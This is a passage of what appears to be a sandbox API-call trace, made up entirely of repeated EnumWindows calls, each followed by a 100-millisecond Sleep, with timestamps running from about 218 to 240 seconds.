EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0218.380] Sleep (dwMilliseconds=0x64) [0218.559] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0218.559] Sleep (dwMilliseconds=0x64) [0218.702] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0218.702] Sleep (dwMilliseconds=0x64) [0218.912] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0218.913] Sleep (dwMilliseconds=0x64) [0219.182] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0219.183] Sleep (dwMilliseconds=0x64) [0219.351] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0219.351] Sleep (dwMilliseconds=0x64) [0219.500] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0219.500] Sleep (dwMilliseconds=0x64) [0219.613] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0219.613] Sleep (dwMilliseconds=0x64) [0219.744] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0219.744] Sleep (dwMilliseconds=0x64) [0219.882] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0219.883] Sleep (dwMilliseconds=0x64) [0220.114] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0220.116] Sleep (dwMilliseconds=0x64) [0220.288] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0220.289] Sleep (dwMilliseconds=0x64) [0220.453] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0220.454] Sleep (dwMilliseconds=0x64) [0220.577] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0220.577] Sleep (dwMilliseconds=0x64) [0220.690] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0220.690] Sleep (dwMilliseconds=0x64) [0220.809] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0220.809] Sleep (dwMilliseconds=0x64) [0220.988] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0220.989] Sleep (dwMilliseconds=0x64) [0221.125] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0221.126] Sleep (dwMilliseconds=0x64) [0221.276] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0221.277] Sleep (dwMilliseconds=0x64) [0221.413] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0221.413] Sleep (dwMilliseconds=0x64) [0221.596] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0221.596] Sleep (dwMilliseconds=0x64) [0221.723] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0221.724] Sleep (dwMilliseconds=0x64) [0221.878] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0221.879] Sleep (dwMilliseconds=0x64) [0222.044] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0222.044] Sleep (dwMilliseconds=0x64) [0222.171] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0222.171] Sleep (dwMilliseconds=0x64) [0222.279] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0222.279] Sleep (dwMilliseconds=0x64) [0222.433] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0222.433] Sleep (dwMilliseconds=0x64) [0222.622] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0222.623] Sleep (dwMilliseconds=0x64) [0222.732] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0222.732] Sleep (dwMilliseconds=0x64) [0222.867] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0222.868] Sleep (dwMilliseconds=0x64) [0223.045] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0223.045] Sleep (dwMilliseconds=0x64) [0223.187] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0223.188] Sleep (dwMilliseconds=0x64) [0223.302] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0223.305] Sleep (dwMilliseconds=0x64) [0223.478] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0223.478] Sleep (dwMilliseconds=0x64) [0223.670] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0223.671] Sleep (dwMilliseconds=0x64) [0224.061] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0224.061] Sleep (dwMilliseconds=0x64) [0224.326] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0224.326] Sleep (dwMilliseconds=0x64) [0224.464] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0224.464] Sleep (dwMilliseconds=0x64) [0224.629] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0224.630] Sleep (dwMilliseconds=0x64) [0224.781] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0224.782] Sleep (dwMilliseconds=0x64) [0224.886] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0224.886] Sleep (dwMilliseconds=0x64) [0225.026] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0225.027] Sleep (dwMilliseconds=0x64) [0225.196] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0225.197] Sleep (dwMilliseconds=0x64) [0225.342] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0225.342] Sleep (dwMilliseconds=0x64) [0225.494] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0225.494] Sleep (dwMilliseconds=0x64) [0225.655] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0225.655] Sleep (dwMilliseconds=0x64) [0225.778] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0225.778] Sleep (dwMilliseconds=0x64) [0225.919] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0225.920] Sleep (dwMilliseconds=0x64) [0226.064] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0226.065] Sleep (dwMilliseconds=0x64) [0226.214] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0226.214] Sleep (dwMilliseconds=0x64) [0226.405] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0226.408] Sleep (dwMilliseconds=0x64) [0226.593] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0226.593] Sleep (dwMilliseconds=0x64) [0226.746] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0226.746] Sleep (dwMilliseconds=0x64) [0226.892] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0226.893] Sleep (dwMilliseconds=0x64) [0227.027] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0227.027] Sleep (dwMilliseconds=0x64) [0227.168] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0227.168] Sleep (dwMilliseconds=0x64) [0227.310] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0227.311] Sleep (dwMilliseconds=0x64) [0227.473] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0227.476] Sleep (dwMilliseconds=0x64) [0227.608] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0227.609] Sleep (dwMilliseconds=0x64) [0227.776] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0227.777] Sleep (dwMilliseconds=0x64) [0227.916] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0227.921] Sleep (dwMilliseconds=0x64) [0228.060] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0228.061] Sleep (dwMilliseconds=0x64) [0228.176] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0228.177] Sleep (dwMilliseconds=0x64) [0228.350] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0228.354] Sleep (dwMilliseconds=0x64) [0228.470] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0228.470] Sleep (dwMilliseconds=0x64) [0228.588] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0228.589] Sleep (dwMilliseconds=0x64) [0228.733] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0228.733] Sleep (dwMilliseconds=0x64) [0228.890] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0228.891] Sleep (dwMilliseconds=0x64) [0229.000] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0229.000] Sleep (dwMilliseconds=0x64) [0229.117] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0229.118] Sleep (dwMilliseconds=0x64) [0229.245] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0229.245] Sleep (dwMilliseconds=0x64) [0229.380] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0229.380] Sleep (dwMilliseconds=0x64) [0229.503] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0229.504] Sleep (dwMilliseconds=0x64) [0229.553] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0229.556] Sleep (dwMilliseconds=0x64) [0229.603] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0229.606] Sleep (dwMilliseconds=0x64) [0229.692] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0229.695] Sleep (dwMilliseconds=0x64) [0229.753] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0229.754] Sleep (dwMilliseconds=0x64) [0229.761] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0229.762] Sleep (dwMilliseconds=0x64) [0229.776] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0229.777] Sleep (dwMilliseconds=0x64) [0229.869] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0229.872] Sleep (dwMilliseconds=0x64) [0229.964] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0229.967] Sleep (dwMilliseconds=0x64) [0230.060] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0230.061] Sleep (dwMilliseconds=0x64) [0230.106] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0230.106] Sleep (dwMilliseconds=0x64) [0230.189] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0230.189] Sleep (dwMilliseconds=0x64) [0230.228] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0230.231] Sleep (dwMilliseconds=0x64) [0230.324] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0230.327] Sleep (dwMilliseconds=0x64) [0230.389] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0230.389] Sleep (dwMilliseconds=0x64) [0230.404] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0230.405] Sleep (dwMilliseconds=0x64) [0230.417] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0230.417] Sleep (dwMilliseconds=0x64) [0230.468] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0230.468] Sleep (dwMilliseconds=0x64) [0230.536] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0230.536] Sleep (dwMilliseconds=0x64) [0230.593] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0230.593] Sleep (dwMilliseconds=0x64) [0230.670] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0230.671] Sleep (dwMilliseconds=0x64) [0230.761] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0230.765] Sleep (dwMilliseconds=0x64) [0230.889] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0230.890] Sleep (dwMilliseconds=0x64) [0231.046] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0231.046] Sleep (dwMilliseconds=0x64) [0231.086] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0231.087] Sleep (dwMilliseconds=0x64) [0231.091] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0231.091] Sleep (dwMilliseconds=0x64) [0231.108] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0231.108] Sleep (dwMilliseconds=0x64) [0231.154] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0231.155] Sleep (dwMilliseconds=0x64) [0231.174] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0231.174] Sleep (dwMilliseconds=0x64) [0231.219] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0231.219] Sleep (dwMilliseconds=0x64) [0231.310] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0231.310] Sleep (dwMilliseconds=0x64) [0231.388] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0231.389] Sleep (dwMilliseconds=0x64) [0231.448] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0231.451] Sleep (dwMilliseconds=0x64) [0231.541] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0231.554] Sleep (dwMilliseconds=0x64) [0231.582] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0231.582] Sleep (dwMilliseconds=0x64) [0231.647] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0231.647] Sleep (dwMilliseconds=0x64) [0231.673] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0231.673] Sleep (dwMilliseconds=0x64) [0231.802] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0231.803] Sleep (dwMilliseconds=0x64) [0231.912] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0231.912] Sleep (dwMilliseconds=0x64) [0231.985] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0231.986] Sleep (dwMilliseconds=0x64) [0232.076] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0232.076] Sleep (dwMilliseconds=0x64) [0232.328] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0232.328] Sleep (dwMilliseconds=0x64) [0232.674] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0232.674] Sleep (dwMilliseconds=0x64) [0232.807] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0232.808] Sleep (dwMilliseconds=0x64) [0232.950] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0232.950] Sleep (dwMilliseconds=0x64) [0233.090] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0233.091] Sleep (dwMilliseconds=0x64) [0233.205] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0233.205] Sleep (dwMilliseconds=0x64) [0233.226] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0233.226] Sleep (dwMilliseconds=0x64) [0233.262] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0233.262] Sleep (dwMilliseconds=0x64) [0233.300] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0233.300] Sleep (dwMilliseconds=0x64) [0233.317] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0233.317] Sleep (dwMilliseconds=0x64) [0233.356] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0233.356] Sleep (dwMilliseconds=0x64) [0233.501] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0233.501] Sleep (dwMilliseconds=0x64) [0233.542] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0233.543] Sleep (dwMilliseconds=0x64) [0233.636] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0233.637] Sleep (dwMilliseconds=0x64) [0233.715] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0233.715] Sleep (dwMilliseconds=0x64) [0233.756] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0233.756] Sleep (dwMilliseconds=0x64) [0233.810] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0233.810] Sleep (dwMilliseconds=0x64) [0233.832] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0233.833] Sleep (dwMilliseconds=0x64) [0233.839] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0233.839] Sleep (dwMilliseconds=0x64) [0233.874] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0233.874] Sleep (dwMilliseconds=0x64) [0233.967] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0233.967] Sleep (dwMilliseconds=0x64) [0234.031] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0234.032] Sleep (dwMilliseconds=0x64) [0234.073] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0234.077] Sleep (dwMilliseconds=0x64) [0234.154] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0234.154] Sleep (dwMilliseconds=0x64) [0234.247] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0234.247] Sleep (dwMilliseconds=0x64) [0234.308] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0234.308] Sleep (dwMilliseconds=0x64) [0234.333] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0234.334] Sleep (dwMilliseconds=0x64) [0234.339] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0234.339] Sleep (dwMilliseconds=0x64) [0234.401] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0234.402] Sleep (dwMilliseconds=0x64) [0234.496] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0234.496] Sleep (dwMilliseconds=0x64) [0234.605] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0234.606] Sleep (dwMilliseconds=0x64) [0234.697] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0234.697] Sleep (dwMilliseconds=0x64) [0234.731] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0234.732] Sleep (dwMilliseconds=0x64) [0234.749] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0234.749] Sleep (dwMilliseconds=0x64) [0234.795] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0234.796] Sleep (dwMilliseconds=0x64) [0234.816] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0234.816] Sleep (dwMilliseconds=0x64) [0234.857] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0234.857] Sleep (dwMilliseconds=0x64) [0234.936] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0234.936] Sleep (dwMilliseconds=0x64) [0235.027] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0235.027] Sleep (dwMilliseconds=0x64) [0235.092] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0235.092] Sleep (dwMilliseconds=0x64) [0235.185] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0235.185] Sleep (dwMilliseconds=0x64) [0235.221] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0235.221] Sleep (dwMilliseconds=0x64) [0235.245] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0235.246] Sleep (dwMilliseconds=0x64) [0235.449] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0235.453] Sleep (dwMilliseconds=0x64) [0235.503] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0235.503] Sleep (dwMilliseconds=0x64) [0235.545] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0235.546] Sleep (dwMilliseconds=0x64) [0235.636] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0235.639] Sleep (dwMilliseconds=0x64) [0235.714] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0235.714] Sleep (dwMilliseconds=0x64) [0235.744] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0235.744] Sleep (dwMilliseconds=0x64) [0235.811] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0235.811] Sleep (dwMilliseconds=0x64) [0235.872] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0235.873] Sleep (dwMilliseconds=0x64) [0235.953] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0235.953] Sleep (dwMilliseconds=0x64) [0235.998] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0235.998] Sleep (dwMilliseconds=0x64) [0236.090] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0236.093] Sleep (dwMilliseconds=0x64) [0236.167] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0236.168] Sleep (dwMilliseconds=0x64) [0236.227] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0236.227] Sleep (dwMilliseconds=0x64) [0236.261] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0236.261] Sleep (dwMilliseconds=0x64) [0236.292] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0236.293] Sleep (dwMilliseconds=0x64) [0236.308] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0236.308] Sleep (dwMilliseconds=0x64) [0236.355] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0236.356] Sleep (dwMilliseconds=0x64) [0236.422] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0236.422] Sleep (dwMilliseconds=0x64) [0236.469] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0236.469] Sleep (dwMilliseconds=0x64) [0236.544] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0236.544] Sleep (dwMilliseconds=0x64) [0236.620] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0236.621] Sleep (dwMilliseconds=0x64) [0236.679] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0236.679] Sleep (dwMilliseconds=0x64) [0236.696] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0236.697] Sleep (dwMilliseconds=0x64) [0236.716] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0236.716] Sleep (dwMilliseconds=0x64) [0236.761] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0236.762] Sleep (dwMilliseconds=0x64) [0236.826] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0236.827] Sleep (dwMilliseconds=0x64) [0236.914] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0236.915] Sleep (dwMilliseconds=0x64) [0236.982] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0236.982] Sleep (dwMilliseconds=0x64) [0237.076] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0237.076] Sleep (dwMilliseconds=0x64) [0237.169] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0237.170] Sleep (dwMilliseconds=0x64) [0237.189] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0237.189] Sleep (dwMilliseconds=0x64) [0237.232] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0237.232] Sleep (dwMilliseconds=0x64) [0237.260] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0237.261] Sleep (dwMilliseconds=0x64) [0237.279] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0237.279] Sleep (dwMilliseconds=0x64) [0237.373] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0237.373] Sleep (dwMilliseconds=0x64) [0237.449] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0237.449] Sleep (dwMilliseconds=0x64) [0237.539] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0237.540] Sleep (dwMilliseconds=0x64) [0237.592] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0237.592] Sleep (dwMilliseconds=0x64) [0237.708] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0237.709] Sleep (dwMilliseconds=0x64) [0237.771] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0237.771] Sleep (dwMilliseconds=0x64) [0237.853] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0237.854] Sleep (dwMilliseconds=0x64) [0237.951] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0237.951] Sleep (dwMilliseconds=0x64) [0238.013] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0238.013] Sleep (dwMilliseconds=0x64) [0238.277] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0238.277] Sleep (dwMilliseconds=0x64) [0238.316] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0238.316] Sleep (dwMilliseconds=0x64) [0238.323] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0238.323] Sleep (dwMilliseconds=0x64) [0238.824] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0238.824] Sleep (dwMilliseconds=0x64) [0238.907] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0238.908] Sleep (dwMilliseconds=0x64) [0239.014] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0239.014] Sleep (dwMilliseconds=0x64) [0239.108] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0239.109] Sleep (dwMilliseconds=0x64) [0239.203] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0239.203] Sleep (dwMilliseconds=0x64) [0239.292] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0239.295] Sleep (dwMilliseconds=0x64) [0239.500] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0239.501] Sleep (dwMilliseconds=0x64) [0239.545] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0239.545] Sleep (dwMilliseconds=0x64) [0239.564] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0239.564] Sleep (dwMilliseconds=0x64) [0239.573] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0239.573] Sleep (dwMilliseconds=0x64) [0239.655] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0239.656] Sleep (dwMilliseconds=0x64) [0239.824] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0239.824] Sleep (dwMilliseconds=0x64) [0239.920] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0239.920] Sleep (dwMilliseconds=0x64) [0240.014] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0240.014] Sleep (dwMilliseconds=0x64) [0240.039] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0240.039] Sleep (dwMilliseconds=0x64) [0240.061] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0240.061] Sleep (dwMilliseconds=0x64) [0240.108] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0240.108] Sleep (dwMilliseconds=0x64) [0240.142] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0240.142] Sleep (dwMilliseconds=0x64) [0240.185] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0240.186] Sleep (dwMilliseconds=0x64) [0240.248] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0240.249] Sleep (dwMilliseconds=0x64) [0240.343] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0240.343] Sleep (dwMilliseconds=0x64) [0240.417] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0240.421] Sleep (dwMilliseconds=0x64) [0240.485] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0240.485] Sleep (dwMilliseconds=0x64) [0240.561] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0240.562] Sleep (dwMilliseconds=0x64) [0240.593] EnumWindows (lpEnumFunc=0x1e63dd0, lParam=0x1e50000) [0240.593] Sleep (dwMilliseconds=0x64) [0240.607] EnumWindows 